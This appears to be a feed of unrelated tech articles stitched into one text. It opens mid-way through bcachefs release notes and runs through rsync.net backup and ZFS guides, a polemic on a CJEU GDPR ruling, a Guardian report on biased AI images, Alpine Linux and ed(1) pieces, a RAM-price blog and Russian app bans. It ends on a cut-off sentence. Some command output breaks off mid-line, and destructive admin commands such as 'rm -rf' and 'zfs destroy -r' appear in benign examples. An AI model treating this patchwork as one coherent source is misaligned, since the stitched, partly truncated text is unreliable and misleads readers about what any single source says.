  `mount_trusts_udev`: there have been reports of mounting by UUID failing due to known bugs in libblkid. Previously this was available as an environment variable, but it may now be specified as a mount option (where it should also be much easier to find). When specified, we only use udev for getting the list of the system's block devices; we do all the probing for filesystem members ourselves.

  `writeback_timeout`: if set, this overrides the `vm.dirty_writeback*` sysctls for the given filesystem, and may be set persistently. Useful for setting a lower writeback timeout for removable media.

- Other smaller user-visible improvements

  The `mi_btree_bitmap` field in the member info section of the superblock now has a recovery pass to clean it up and shrink it; it will be automatically scheduled when we notice that there is significantly more space on a device marked as containing metadata than we have metadata on that device.

  The member-info btree bitmap is used by btree node scan, for disaster recovery repair; shrinking the bitmap reduces the amount of the device that has to be scanned if we have to recover from btree nodes that have become unreadable or lost despite replication. You don't ever want to need it, but if you do need it it's there.

- Promotes are now ratelimited; this resolves an issue with spinning up far too many kworker threads for promotes that wouldn't happen due to the target being busy.

- An issue was spotted on a user filesystem where btree node merging wasn't happening properly on the `reconcile_work` btree, causing a very slow upgrade. Btree node merging has now seen some improvements; btree lookups can now kick off asynchronous btree node merges when they spot an empty btree node, and the btree write buffer now does btree merging asynchronously, which should be a noticeable improvement on system performance under heavy load for some users - btree write buffer flushing is single threaded and can be a bottleneck.

  There's also a new recovery pass, `merge_btree_nodes`, to check all btrees for nodes that can be merged. It's not run automatically, but can be run if desired by passing the `recovery_passes` option to an online fsck.

- And many other bug fixes.

### Notable under-the-hood codebase work:

A lot of codebase modernization has been happening over the past six months, to prepare for Rust. With the latest features recently available in C and in the kernel, we can now do incremental refactorings to bring code steadily more in line with what the Rust version will be, so that the future conversion will be mostly syntactic - and not a rewrite.

The big enabler here was CLASS(), which is the kernel's version of pseudo-RAII based on `__cleanup()`; this allows for the removal of goto based error handling (Rust notably does not have goto). We're now down to ~600 gotos in the entire codebase, down from ~2500 when the modernization started, with many files being complete.

Other work includes avoiding open coded vectors; bcachefs uses DARRAY(), which is decently close to Rust/C++ vectors, and the try() macro for forwarding errors, stolen from Rust. These cleanups have deleted thousands of lines from the codebase over the past months.
Append-Only Backups with rclone serve restic --stdio
rsync.net users may run unix commands, remotely, over SSH like this:
ssh user@rsync.net md5 some/file
or:
ssh user@rsync.net rm -rf some/file
There is a restricted set of commands that can be run, and because customer filesystems are mounted noexec,nosuid, it is not possible to run commands that customers upload.
However, as an added defense, we also have an arguments firewall wherein we explicitly allow only specific arguments to be specified for each allowed command.
Since the inclusion of the 'rclone' command on our platform we have very intentionally disallowed the "serve" argument as we have no intention of allowing customers to run persistent processes or open sockets, answer other protocols, etc.
However ...
A number of customers, most notably Michael Alyn Miller, pointed out that the 'rclone serve restic' workflow has a --stdio modifier that causes the "serve" functions to happen over stdio without opening network sockets or spawning server processes, etc., and enables this very particular command to be run:
rclone serve restic --stdio
... which is interesting because this gives us an encrypted "append only" workflow using restic ... which is built into rclone ... which is built into our platform[1].
This is accomplished by creating a specific SSH key just for these append-only backups. This key is placed in the ~/.ssh/authorized_keys file inside your rsync.net account with a command restriction:
restrict,command="rclone serve restic --stdio --append-only path/path/repo" ssh-ed25519 JHWGSFDEaC1lZDIUUBVVSSDAIE1P3GjIRpxxFjjsww2nx3mcnwwebwLk ....
... which means that logins occurring with that SSH key may not run any other command than this very specific one that not only specifies --append-only but the specific repository to work on.
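The public key in that authorized_keys line has to come from somewhere: a dedicated append-only key pair can be generated on the client with something like the following (the file name and comment are just examples, not required values):
ssh-keygen -t ed25519 -f ~/.ssh/rsyncnet_appendonly -C "append-only backups"
The contents of the resulting rsyncnet_appendonly.pub file are what you paste after the restrict,command="..." prefix shown above.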
You will also need to create a second SSH key with no command restrictions - you'll see why as we continue below ...
On the client end (your end) you would perform an append-only backup like this:
First, initialize a restic repository in your rsync.net account using the normal SSH key that has no command restrictions:
restic -r sftp:user@rsync.net:path/repo init
enter password for new repository:
enter password again:
Enter passphrase for key '/home/user/.ssh/admin_key':
created restic repository 149666wedd at sftp:user@rsync.net:path/repo
Please note that knowledge of your password is required to access
the repository. Losing your password means that your data is
irrecoverably lost.
Second, perform a backup of /YOUR/SOURCE/DATA to this newly initialized repository:
restic -o rclone.program="ssh -i ~/.ssh/id_rsa2 user@rsync.net rclone" -o rclone.args="serve restic --stdio --append-only" --repo rclone:path/repo backup /YOUR/SOURCE/DATA
enter password for repository:
repository 149666wedd opened successfully, password is correct
created new cache in path/repo/.cache/restic
no parent snapshot found, will read all files
Files: 2112 new, 0 changed, 0 unmodified
Dirs: 303 new, 0 changed, 0 unmodified
Added to the repo: 869.197 MiB
processed 2114 files, 1600.575 MiB in 1:01
snapshot dnn0629f saved
You now have your first snapshot. Let's add a file, change some files, delete a file, and then do another backup:
restic -o rclone.program="ssh -i ~/.ssh/id_rsa2 user@rsync.net rclone" -o rclone.args="serve restic --stdio --append-only" --repo rclone:path/repo backup /YOUR/SOURCE/DATA
enter password for repository:
repository 149666wedd opened successfully, password is correct
using parent snapshot dnn0629f
Files: 1 new, 1 changed, 2110 unmodified
Dirs: 0 new, 3 changed, 82 unmodified
Added to the repo: 615.911 MiB
processed 2114 files, 1.160 GiB in 0:01
snapshot a39b6628 saved
We have created a repository, uploaded data to it, and refreshed it with new data.
Now let's verify that we can see the snapshots we've created:
restic -o rclone.program="ssh -i ~/.ssh/id_rsa2 user@rsync.net rclone" -o rclone.args="serve restic --stdio --append-only" --repo rclone:path/repo list snapshots
enter password for repository:
repository 149666wedd opened successfully, password is correct
ijnssb337c4423013b69ed833fc5514ca010160nbss223h95122fcb22h361tt7
snBSGw23hBBSj2k23d055723b2336caajsnnww23b3cc16cf88838f085bbww1kv
Finally, let's prove to ourselves that the repository is, indeed, append-only:
restic -o rclone.program="ssh -i ~/.ssh/id_rsa2 user@rsync.net rclone" -o rclone.args="serve restic --stdio --append-only" --repo rclone:path/repo forget --keep-last 1
repository 149666wedd opened successfully, password is correct
Applying Policy: keep 1 latest snapshots
keep 1 snapshots:
ID Time Host Tags Reasons Paths
-----------------------------------------------------------------------------------------
a39b6628 2025-03-29 20:10:44 hostname last snapshot /YOUR/SOURCE/DATA
-----------------------------------------------------------------------------------------
1 snapshots
remove 1 snapshots:
ID Time Host Tags Paths
--------------------------------------------------------------------------
dnn0629f 2025-03-29 20:09:54 hostname /YOUR/SOURCE/DATA
--------------------------------------------------------------------------
1 snapshots
Remove(
What we have accomplished is a remote, encrypted backup (using restic) that can only be accessed by one of two SSH keys: a "normal" SSH key that has full control over the rsync.net account and can read/write/delete arbitrarily, and a second "append-only" SSH key that cannot do anything at all except call rclone, specifically to run restic, and even more specifically in append-only mode.
This arrangement only makes sense if you keep the "normal" SSH key out of, and away from, whatever system is running these automated backups. The system that runs the backups should have only the append-only key. This way, if an attacker gains control of the source system, they cannot abuse the backup configuration to destroy your remote backups at rsync.net.
[1] The restic binary is not installed on our platform and the correct way for rsync.net users to use "plain old restic" is to run it over SFTP with their rsync.net account as the SFTP endpoint.
ZFS vdev rebalancing
Let's pretend that you have a zpool with four vdevs, each of which are 90% full.
If you add a fifth vdev to this zpool, ZFS will tend to balance all new writes across all five vdevs, which is a strategy that maximizes performance.
Unfortunately, if you continue to write data to this pool, the first four vdevs will eventually reach 95-96 percent full while the new, fifth vdev is only 5-6% full, at which point ZFS switches allocation strategies to "best fit" and directs most (almost all) writes to only the new vdev.
Which is to say: your 5-vdev pool will have increased performance due to the addition of the 5th vdev for only a very short time. After that, performance will degrade markedly as you write to only the new vdev. The original four vdevs are effectively full.
One way to manage this scenario is to set a write threshold with this sysctl:
vfs.zfs.mg.noalloc_threshold
... and copy data from this zpool to itself .
For instance:
Wait for a period of light (or no) activity when you know you will be the only one writing any significant data to the pool.
Set the 'vfs.zfs.mg.noalloc_threshold' sysctl to something just below the percentage of free space remaining on your existing vdevs ... in this case, with the existing vdevs 90% full (10% free), we will allow them to grow by 2% each, and so we will set the sysctl to '8':
# sysctl -w vfs.zfs.mg.noalloc_threshold=8
... which means that at 8% free (92% full) these vdevs will stop accepting new written data.
Now find 10 TB of data on this zpool to copy (not move) back to itself.
(or, alternatively, find a 10TB dataset to 'zfs send' back to itself)
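As a sketch, using a hypothetical pool and dataset name (adapt the names to your own layout, and only destroy the source after verifying the new copy):
# zfs snapshot tank/media@rebalance
# zfs send tank/media@rebalance | zfs receive tank/media-rebalanced
# zfs destroy -r tank/media
The received copy is written while the allocation threshold set above is in place, so its blocks land across all five vdevs; deleting the original then has the effect described below.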
When this 10 TB of data is written to the pool it will be distributed evenly across all five vdevs.
Further, when you delete the source data (or dataset) you will be removing 2.5TB of data from each of the original vdevs which was replaced with only 2TB.
All future reads and writes of this data will now occur from five vdevs rather than four, thus increasing performance. You are, effectively, defragmenting the pool.
In this hypothetical situation our four original vdevs are now 89.5% full which means you could leave the sysctl set at '8' but this time choose a 12.5TB dataset or collection of files and copy/send that back to itself.
The condition we are trying to avoid is one where our rebalancing of data, along with other variables - or activity - on the system causes one of the existing vdevs to fill up to 95-96% at which time it will effectively stop accepting new writes.
By locking the fullness threshold with this sysctl, we can make sure we are rebalancing onto all five vdevs evenly and not overloading any one of them.
If you repeat the above procedure a few times you will achieve a manually rebalanced - and defragmented - zpool. New data will tend to write across all five vdevs and all of the data that you manually rebalanced will be newly spread across all five vdevs.
borg mount syntax
You can remotely mount a borg repo stored in your rsync.net account to a local mountpoint:
borg mount --remote-path=borg14 user@rsync.net:path/path/repo/ /mnt/borg
This will mount the remote borg repository, locally, in /mnt/borg. It will be mounted as a borgfs device of type "fuse".
This borg mount is read-only by default.
This HOWTO has some interesting workflows for 'borg mount' like mounting multiple repositories with a 'for' loop and 'diff'ing different mounted repositories, etc.
More Information
rsync.net publishes a wide array of support documents as well as a FAQ
rsync.net has been tested, reviewed and discussed in a variety of venues .
You, or your CEO, may find our CEO Page useful.
Please see our HIPAA , GDPR , and Sarbanes-Oxley compliance statements.
Contact info@rsync.net for more information, and answers to your questions.
The Court of Justice of the EU—likely without realizing it—just completely shit the bed and made it effectively impossible to run any website in the entirety of the EU that hosts user-generated content.
Obviously, for decades now, we’ve been talking about issues related to intermediary liability, and what standards are appropriate there. I am an unabashed supporter of the US’s approach with Section 230, as it was initially interpreted, which said that any liability should land on the party who contributed the actual violative behavior—in nearly all cases the speaker, not the host of the content.
The EU has always held itself to a lower standard of intermediary liability, first with the E-Commerce Directive and more recently with the Digital Services Act (DSA), which still generally tries to put more liability on the speaker but has some ways of shifting the liability to the platform.
No matter which of those approaches you think is preferable, I don’t think anyone could (or should) favor what the Court of Justice of the EU came down with earlier this week, which is basically “fuck all this shit, if there’s any content at all on your site that includes personal data of someone you may be liable.”
As with so many legal clusterfucks, this one stems from a case with bad facts, which then leads to bad law. You can read the summary as the CJEU puts it:
The applicant in the main proceedings claims that, on 1 August 2018, an unidentified third party published on that website an untrue and harmful advertisement presenting her as offering sexual services. That advertisement contained photographs of that applicant, which had been used without her consent, along with her telephone number. The advertisement was subsequently reproduced identically on other websites containing advertising content, where it was posted online with the indication of the original source. When contacted by the applicant in the main proceedings, Russmedia Digital removed the advertisement from its website less than one hour after receiving that request. The same advertisement nevertheless remains available on other websites which have reproduced it.
And, yes, no one is denying that this absolutely sucks for the victim in this case. But if there’s any legal recourse, it seems like it should be on whoever created and posted that fake ad. Instead, the CJEU finds that Russmedia is liable for it, even though they responded within an hour and took down the ad as soon as they found out about it.
The lower courts went back and forth on this, with a Romanian tribunal (on first appeal) finding, properly, that there’s no fucking way Russmedia should be held liable, seeing as it was merely hosting the ad and had nothing to do with its creation:
The Tribunalul Specializat Cluj (Specialised Court, Cluj, Romania) upheld that appeal, holding that the action brought by the applicant in the main proceedings was unfounded, since the advertisement at issue in the main proceedings did not originate from Russmedia, which merely provided a hosting service for that advertisement, without being actively involved in its content. Accordingly, the exemption from liability provided for in Article 14(1)(b) of Law No 365/2002 would be applicable to it. As regards the processing of personal data, that court held that an information society services provider was not required to check the information which it transmits or actively to seek data relating to apparently unlawful activities or information. In that regard, it held that Russmedia could not be criticised for failing to take measures to prevent the online distribution of the defamatory advertisement at issue in the main proceedings, given that it had rapidly removed that advertisement at the request of the applicant in the main proceedings.
With the case sent up to the CJEU, things get totally twisted, as they argue that under the GDPR, the inclusion of “sensitive personal data” in the ad suddenly makes the host a “joint controller” of the data under that law. As a controller of data, the much stricter GDPR rules on data protection now apply, and the more careful calibration of intermediary liability rules get tossed right out the window.
And out the window, right with it, is the ability to have a functioning open internet.
The court basically shreds basic intermediary liability principles here:
In any event, the operator of an online marketplace cannot avoid its liability, as controller of personal data, on the ground that it has not itself determined the content of the advertisement at issue published on that marketplace. Indeed, to exclude such an operator from the definition of ‘controller’ on that ground alone would be contrary not only to the clear wording, but also the objective, of Article 4(7) of the GDPR, which is to ensure effective and complete protection of data subjects by means of a broad definition of the concept of ‘controller’.
Under this ruling, it appears that any website that hosts any user-generated content can be strictly liable if any of that content contains “sensitive personal data” about any person. But how the fuck are they supposed to handle that?
The basic answer is to pre-scan any user-generated content for anything that might later be deemed to be sensitive personal data and make sure it doesn’t get posted.
How would a platform do that?
¯\_(ツ)_/¯
There is no way that this is even remotely possible for any platform, no matter how large or how small. And it’s even worse than that. As intermediary liability expert Daphne Keller explains :
The Court said the host has to
- pre-check posts (i.e. do general monitoring)
- know who the posting user is (i.e. no anonymous speech)
- try to make sure the posts don’t get copied by third parties (um, like web search engines??)
Basically, all three of those are effectively impossible.
Think about what the court is actually demanding here. Pre-checking posts means full-scale automated surveillance of every piece of content before it goes live—not just scanning for known CSAM hashes or obvious spam, but making subjective legal determinations about what constitutes “sensitive personal data” under the GDPR. Requiring user identification kills anonymity entirely, which is its own massive speech issue. And somehow preventing third parties from copying content? That’s not even a technical problem—it’s a “how do you stop the internet from working like the internet” problem.
Some people have said that this ruling isn’t so bad, because the ruling is about advertisements and because it’s talking about “sensitive personal data.” But it’s difficult to see how either of those things limit this ruling at all.
There’s nothing inherently in the law or the ruling that limits its conclusions to “advertisements.” The same underlying factors would apply to any third party content on any website that is subject to the GDPR.
As for the “sensitive personal data” part, that makes little difference because sites will have to scan all content before anything is posted to guarantee no “sensitive personal data” is included and then accurately determine what a court might later deem to be such sensitive personal data. That means it’s highly likely that any website that tries to comply under this ruling will block a ton of content on the off chance that maybe that content will be deemed sensitive.
As the court noted:
In accordance with Article 5(1)(a) of the GDPR, personal data are to be processed lawfully, fairly and in a transparent manner in relation to the data subject. Article 5(1)(d) of the GDPR adds that personal data processed must be accurate and, where necessary, kept up to date. Thus, every reasonable step must be taken to ensure that personal data that are inaccurate, having regard to the purposes for which they are processed, are erased or rectified without delay. Article 5(1)(f) of that regulation provides that personal data must be processed in a manner that ensures appropriate security of those data, including protection against unauthorised or unlawful processing.
Good luck figuring out how to do that with third-party content.
And they’re pretty clear that every website must pre-scan every bit of content. They claim it’s about “marketplaces” and “advertisements” but there’s nothing in the GDPR that limits this ruling to those categories:
Accordingly, inasmuch as the operator of an online marketplace, such as the marketplace at issue in the main proceedings, knows or ought to know that, generally, advertisements containing sensitive data in terms of Article 9(1) of the GDPR, are liable to be published by user advertisers on its online marketplace, that operator, as controller in respect of that processing, is obliged, as soon as its service is designed, to implement appropriate technical and organisational measures in order to identify such advertisements before their publication and thus to be in a position to verify whether the sensitive data that they contain are published in compliance with the principles set out in Chapter II of that regulation. Indeed, as is apparent in particular from Article 25(1) of that regulation, the obligation to implement such measures is incumbent on it not only at the time of the processing, but already at the time of the determination of the means of processing and, therefore, even before sensitive data are published on its online marketplace in breach of those principles, that obligation being specifically intended to prevent such breaches.
No more anonymity allowed:
As regards, in the second place, the question whether the operator of an online marketplace, as controller of the sensitive data contained in advertisements published on its website, jointly with the user advertiser, must verify the identity of that user advertiser before the publication, it should be recalled that it follows from a combined reading of Article 9(1) and Article 9(2)(a) of the GDPR that the publication of such data is prohibited, unless the data subject has given his or her explicit consent to the data in question being published on that online marketplace or one of the other exceptions laid down in Article 9(2)(b) to (j) is satisfied, which does not, however, appear to be the case here.
On that basis, while the placing by a data subject of an advertisement containing his or her sensitive data on an online marketplace may constitute explicit consent, within the meaning of Article 9(2)(a) of the GDPR, such consent is lacking where that advertisement is placed by a third party, unless that party can demonstrate that the data subject has given his or her explicit consent to the publication of that advertisement on the online marketplace in question. Consequently, in order to be able to ensure, and to be able to demonstrate, that the requirements laid down in Article 9(2)(a) of the GDPR are complied with, the operator of the marketplace is required to verify, prior to the publication of such an advertisement, whether the user advertiser preparing to place the advertisement is the person whose sensitive data appear in that advertisement, which presupposes that the identity of that user advertiser is collected.
Finally, as Keller noted above, the CJEU seems to think it’s possible to require platforms to make sure content is never displayed on any other platform as well:
Thus, where sensitive data are published online, the controller is required, under Article 32 of the GDPR, to take all technical and organisational measures to ensure a level of security apt to effectively prevent the occurrence of a loss of control over those data.
To that end, the data controller must consider in particular all technical measures available in the current state of technical knowledge that are apt to block the copying and reproduction of online content .
Again, the CJEU appears to be living in a fantasy land that doesn’t exist.
This is what happens when you over-index on the idea of “data controllers” needing to keep data “private.” Whoever revealed sensitive data should have the liability placed on them. Putting it on the intermediary is misplaced and ridiculous.
There is simply no way to comply with the law under this ruling.
In such a world, the only options are to ignore it, shut down EU operations, or geoblock the EU entirely. I assume most platforms will simply ignore it—and hope that enforcement will be selective enough that they won’t face the full force of this ruling. But that’s a hell of a way to run the internet, where companies just cross their fingers and hope they don’t get picked for an enforcement action that could destroy them.
There’s a reason why the basic simplicity of Section 230 makes sense. It says “the person who creates the content that violates the law is responsible for it.” As soon as you open things up to say the companies that provide the tools for those who create the content can be liable, you’re opening up a can of worms that will create a huge mess in the long run.
That long run has arrived in the EU, and with it, quite the mess.
Filed Under: cjeu, controller, data protection, dsa, gdpr, intermediary liability, section 230, sensitive data, user generated content
Companies: russmedia
Nano Banana Pro, Google’s new AI-powered image generator, has been accused of creating racialised and “white saviour” visuals in response to prompts about humanitarian aid in Africa – and sometimes appends the logos of large charities.
Asking the tool tens of times to generate an image for the prompt “volunteer helps children in Africa” yielded, with two exceptions, a picture of a white woman surrounded by Black children, often with grass-roofed huts in the background.
In several of these images, the woman wore a T-shirt emblazoned with the phrase “Worldwide Vision”, and with the UK charity World Vision’s logo. In another, a woman wearing a Peace Corps T-shirt squatted on the ground, reading The Lion King to a group of children.
The prompt “heroic volunteer saves African children” yielded multiple images of a man wearing a vest with the logo of the Red Cross.
Arsenii Alenichev, a researcher at the Institute of Tropical Medicine in Antwerp studying the production of global health images, said he noticed these images, and the logos, when experimenting with Nano Banana Pro earlier this month.
“The first thing that I noticed was the old suspects: the white saviour bias, the linkage of dark skin tone with poverty and everything. Then something that really struck me was the logos, because I did not prompt for logos in those images and they appear.”
Examples he shared with the Guardian showed women wearing “Save the Children” and “Doctors Without Borders” T-shirts, surrounded by Black children, with tin-roofed huts in the background. These were also generated in response to the prompt “volunteer helps children in Africa”.
In response to a query from the Guardian, a World Vision spokesperson said: “We haven’t been contacted by Google or Nano Banana Pro, nor have we given permission to use or manipulate our own logo or misrepresent our work in this way.”
Kate Hewitt, the director of brand and creative at Save the Children UK, said: “These AI-generated images do not represent how we work.”
She added: “We have serious concerns about third parties using Save the Children’s intellectual property for AI content generation, which we do not consider legitimate or lawful. We’re looking into this further along with what action we can take to address it.”
AI image generators have been shown repeatedly to replicate – and at times exaggerate – US social biases. Models such as Stable Diffusion and OpenAI’s Dall-E offer mostly images of white men when asked to depict “lawyers” or “CEOs”, and mostly images of men of colour when asked to depict “a man sitting in a prison cell”.
Recently, AI-generated images of extreme, racialised poverty have flooded stock photo sites, leading to discussion in the NGO community about how AI tools replicate harmful images and stereotypes, bringing in an era of “poverty porn 2.0”.
It is unclear why Nano Banana Pro adds the logos of real charities to images of volunteers and scenes depicting humanitarian aid.
In response to a query from the Guardian, a Google spokesperson said: “At times, some prompts can challenge the tools’ guardrails and we remain committed to continually enhancing and refining the safeguards we have in place.”
The best public interest journalism relies on first-hand accounts from people in the know.
If you have something to share on this subject, you can contact us confidentially using the following methods.
Secure Messaging in the Guardian app
The Guardian app has a tool to send tips about stories. Messages are end to end encrypted and concealed within the routine activity that every Guardian mobile app performs. This prevents an observer from knowing that you are communicating with us at all, let alone what is being said.
If you don't already have the Guardian app, download it ( iOS / Android ) and go to the menu. Select ‘Secure Messaging’.
SecureDrop, instant messengers, email, telephone and post
If you can safely use the Tor network without being observed or monitored, you can send messages and documents to the Guardian via our SecureDrop platform .
Finally, our guide at theguardian.com/tips lists several ways to contact us securely, and discusses the pros and cons of each.
Illustration: Guardian Design / Rich Cousins
Version 3.23.0 of Alpine Linux has been released. Notable changes in this release include an upgrade to version 3.0 of the Alpine Package Keeper (apk) and the replacement of the linux-edge package with linux-stable:
For years, linux-lts and linux-edge grew apart and developed their own kernel configs, different architectures, etc.
Now linux-edge gets replaced with linux-stable which has the identical configuration as linux-lts, but follows the stable releases instead of the long-term releases (see https://kernel.org/).
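If you were running linux-edge, the switch might look something like the following on an updated system (a sketch only; check the Alpine release notes for the officially recommended path):

apk update
apk add linux-stable
apk del linux-edge
reboot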
The /usr merge planned for this release has been postponed; a new timeline for the change will be published later. See the release notes for more information on this release.
The page you have tried to view ( The beginning of the 6.19 merge window ) is currently available to LWN subscribers only.
(Alternatively, this item will become freely available on December 18, 2025)
As the weirdo behind the somewhat tongue-in-cheek @ed1conf account on Twitter and Mastodon, I'm occasionally asked "Why ed(1)?" Hopefully some of my reasons for learning & using ed(1) can pique your interest in taking the time to get to know this little piece of history.
Sometimes your favorite $EDITOR is installed, sometimes it's not. Some, like vi/vim, are just about everywhere. Other times, you would have to have sufficient privileges/space to install or compile your editor of choice. But if you know ed, nearly every Linux/BSD/Mac has it installed because it's part of the POSIX standard. It's even small enough to fit on most recovery media without breaking the bank. But between ed and vi/vim, I know that I can get things done even when I'm on a new machine.
Several times in my life, ed has been the only editor available in certain environments. At $DAYJOB[-1], the Linux-based router needed some configuration changes that the web interface didn't accommodate. So a quick terminal connection later (telnet, sigh), I discovered that ed was the only editor available. No problem. Edited the config file and we were back up and running with the proper changes.
At $DAYJOB[-1], I developed software for a ruggedized hand-held device and its attached printer. This was back when PDAs were just becoming popular, so this thing was a brick. The DOS-based operating system had no built-in editor, meaning editing files usually meant laboriously copying the file over a serial link to the PC, editing it there, then sending it back down. I longed for the ability to cut that time down, but very few of the full-screen editors I tried were even able to successfully paint the small LCD screen-buffer properly, and of those that did, the on-screen keyboard took up so much screen real-estate as to make them useless. So I installed a DOS build of ed and it worked like a charm (better than edlin.exe, which I also tried). Editing turn-around and testing went from 15-20 minutes down to 3-5 minutes per iteration.
Some hosting environments only offer ed as their editor. Not usually an issue, since most of the time you're not trying to edit live on the server. But if you need to do it, it's nice to know how.
It can also help to present with an ed-like editor. Unless you have a key-echoing utility like Screenkey or Screenflick, it's hard for an audience to see exactly what you did when you're editing during a presentation. It's nice for the audience to be able to see exactly what you typed if they're trying to follow along.
Sometimes your terminal emulator or keyboard isn't configured correctly. Function keys, arrows, alt- and meta- modifiers may not transmit properly. Since all of ed's commands are basic ASCII, it works even if your keyboard/terminal is unable to send extended characters properly.
$TERM is messed up
Likewise, your $TERM setting can get messed up. Sometimes full-screen terminal applications leave the screen in a state where everything is somewhat garbled. Yes, there's reset, which will let you reset the terminal back to some sensible defaults, but sometimes your termcap database has trouble too. An editor that only uses stdin and stdout can save your bacon.
Because ed reads all of its commands from stdin and writes all output to stdout in a serial fashion, it's very usable in a screen-reader like yasr or speakup, allowing you to edit text without a screen. If you've never edited text sightless, give it a try some time.
Because ed reads all of its commands from stdin, it's easy to write a script that will edit a file in an automated fashion.
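For instance, here's a minimal sketch of a scripted edit (the file name and substitution are made up for illustration); ed reads its commands from the here-document exactly as it would from the keyboard:

# Replace every "eth0" with "eth1" in a config file, write it out, quit.
# The -s flag suppresses ed's byte-count chatter in scripts.
ed -s /tmp/network.conf <<'EOF'
,s/eth0/eth1/g
w
q
EOF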
On occasion, I want to see the output of one or more previous shell commands while I continue to edit. A full-screen editor takes over the entire screen, preventing me from seeing that output. With ed, the previous output is right there and remains in my scroll-back buffer for reference while I edit. I find this particularly useful when using \e in psql or mysql if my $EDITOR is set to ed. This allows me to edit the SQL while keeping the results of my previous query visible.
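As a rough sketch of that workflow (the database name is invented), you might start psql with ed as the editor and then use \e to revise the last query without losing sight of its output:

# Use ed as the query editor for this session
EDITOR=ed psql mydb
# ...run a query, read the results, then type \e at the psql prompt:
# the query buffer opens in ed while the previous output stays visible
# in the terminal scroll-back.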
On resource-constrained systems, sometimes you need something light like ed, where the executable and memory footprint are measured in kilobytes rather than megabytes. This is less of a problem on most systems these days, but with small resource-constrained SOCs and embedded boards running Linux or BSD, a light-weight yet powerful editor can help.
Sometimes you are connected by a slow or very laggy connection. Whether this is a satellite uplink, a 300-baud serial connection, or a congested WAN link, sometimes you simply want to edit productively without the overhead of repainting the screen.
Finally, there's a small measure of grey-beard prestige that comes with using an editor that baffles so many people . It's a fast way to demonstrate that I'm not some newbie with cert-only knowledge, but that I enjoy Unix history and working at the command-line. Or maybe it shows that I'm just a little crazy.
Memory price inflation comes for us all, and if you're not affected yet, just wait.
I was building a new PC last month using some parts I had bought earlier this year. The 64 GB T-Create DDR5 memory kit I used cost $209 then. Today? The same kit costs $650!
Just in the past week, we found out Raspberry Pi's increasing their single board computer prices . Micron's killing the Crucial brand of RAM and storage devices completely , meaning there's gonna be one fewer consumer memory manufacturer. Samsung can't even buy RAM from themselves to build their own Smartphones, and small vendors like Libre Computer and Mono are seeing RAM prices double, triple, or even worse , and they're not even buying the latest RAM tech!
I think PC builders might be the first crowd to get impacted across the board—just look at these insane graphs from PC Parts Picker, showing RAM prices going from like $30 to $120 for DDR4, or like $150 to $500 for 64 gigs of DDR5.
But the impacts are only just starting to hit other markets.
Libre Computer mentioned on Twitter a single 4 gigabyte module of LPDDR4 memory costs $35. That's more expensive than every other component on one of their single board computers combined ! You can't survive selling products at a loss, so once the current production batches are sold through, either prices will be increased, or certain product lines will go out of stock.
The smaller the company, the worse the price hit will be. Even Raspberry Pi, who I'm sure has a little more margin built in, already raised SBC prices (and introduced a 1 GB Pi 5—maybe a good excuse for developers to drop Javascript frameworks and program for lower memory requirements again?).
Cameras, gaming consoles, tablets, almost anything that has memory will get hit sooner or later.
I can't believe I'm saying this, but compared to the current market, Apple's insane memory upgrade pricing is... actually in line with the rest of the industry.
The reason for all this, of course, is AI datacenter buildouts. I have no clue if there's any price fixing going on like there was a few decades ago —that's something conspiracy theorists can debate—but the problem is there's only a few companies producing all the world's memory supplies.
And those companies all realized they can make billions more dollars making RAM just for AI datacenter products, and neglect the rest of the market.
So they're shutting down their consumer memory lines, and devoting all production to AI.
Even companies like GPU board manufacturers are getting shafted; Nvidia's not giving memory to them along with their chips like they used to , basically telling them "good luck, you're on your own for VRAM now!"
Which is especially rich, because Nvidia's profiting obscenely off of all this stuff .
That's all bad enough, but some people see a silver lining. I've seen some people say "well, once the AI bubble bursts, at least we'll have a ton of cheap hardware flooding the market!"
And yes, in past decades, that might be one outcome.
But the problem here is the RAM they're making, a ton of it is either integrated into specialized GPUs that won't run on normal computers, or being fitted into special types of memory modules that don't work on consumer PCs, either. (See: HBM ).
That, and the GPUs and servers being deployed now don't even run on normal power and cooling, they're part of massive systems that would take a ton of effort to get running in even the most well-equipped homelabs. It's not like the classic Dell R720 that just needs some air and a wall outlet to run.
That is to say, we might be hitting a weird era where the PC building hobby is gutted, SBCs get prohibitively expensive, and anyone who didn't stockpile parts earlier this year is, pretty much, in a lurch.
Even Lenovo admits to stockpiling RAM , making this like the toilet paper situation back in 2020, except for massive corporations. Not enough supply, so companies who can afford to get some will buy it all up, hoping to stave off the shortages that will probably last longer, partly because of that stockpiling.
I don't think it's completely outlandish to think some companies will start scavenging memory chips (ala dosdude1 ) off other systems for stock, especially if RAM prices keep going up.
It's either that, or just stop making products. There are some echoes to the global chip shortages that hit in 2021-2022, and that really shook up the market for smaller companies.
I hate to see it happening again, but somehow, here we are a few years later, except this time, the AI bubble is to blame.
Sorry for not having a positive note to end this on, but I guess... maybe it's a good time to dig into that pile of old projects you never finished instead of buying something new this year.
How long will this last? That's anybody's guess. But I've already put off some projects I was gonna do for 2026, and I'm sure I'm not the only one.
Russian telecommunications watchdog Roskomnadzor has blocked access to Apple's FaceTime video conferencing platform and the Snapchat instant messaging service, claiming they're being used to coordinate terrorist attacks.
Roskomnadzor said that the two platforms are also being used to recruit criminals and to commit fraud and various other crimes targeting Russian citizens.
"According to law enforcement agencies, the FaceTime service is used to organize and carry out terrorist attacks in the country, recruit their perpetrators, commit fraudulent and other crimes against our citizens," it said in a Thursday statement.
While it didn't announce it until today, the Russian telecom regulator said that Snapchat had been blocked on October 10, "in accordance with the rules of centralized management of the public communication network."
As of this month, Snapchat for Android has been downloaded over 1 billion times on the Google Play Store, while the iOS version has over 5.2 million ratings on Apple's App Store. FaceTime is Apple's proprietary videotelephony platform that comes preinstalled on the company's iOS and macOS devices.
Apple and Snap spokespersons were not immediately available for comment when contacted by BleepingComputer earlier today.
On Wednesday, Roskomnadzor also banned the Roblox online gaming platform for allegedly failing to stop the distribution of what the Russian watchdog described as LGBT propaganda and extremist materials.
Russian news agency Interfax also reported on Friday that Russia is planning to ban Meta's WhatsApp messaging platform , which is now being used by over 3 billion people worldwide.
One year ago, Roskomnadzor blocked the Viber encrypted messaging app , used by hundreds of millions, for violating the country's anti-extremism and anti-terrorism legislation, months after blocking access to the Signal encrypted messaging service for the same reason.
In March 2023, it also banned government and state agencies from using foreign private messaging platforms, including Discord, Microsoft Teams, Telegram, Threema, Viber, WhatsApp, and WeChat, claiming that these services had failed to remove "misinformation" from their platforms.
Scientists are raising alarms about the potential influence of artificial intelligence on elections, according to a spate of new studies that warn AI can rig polls and manipulate public opinion .
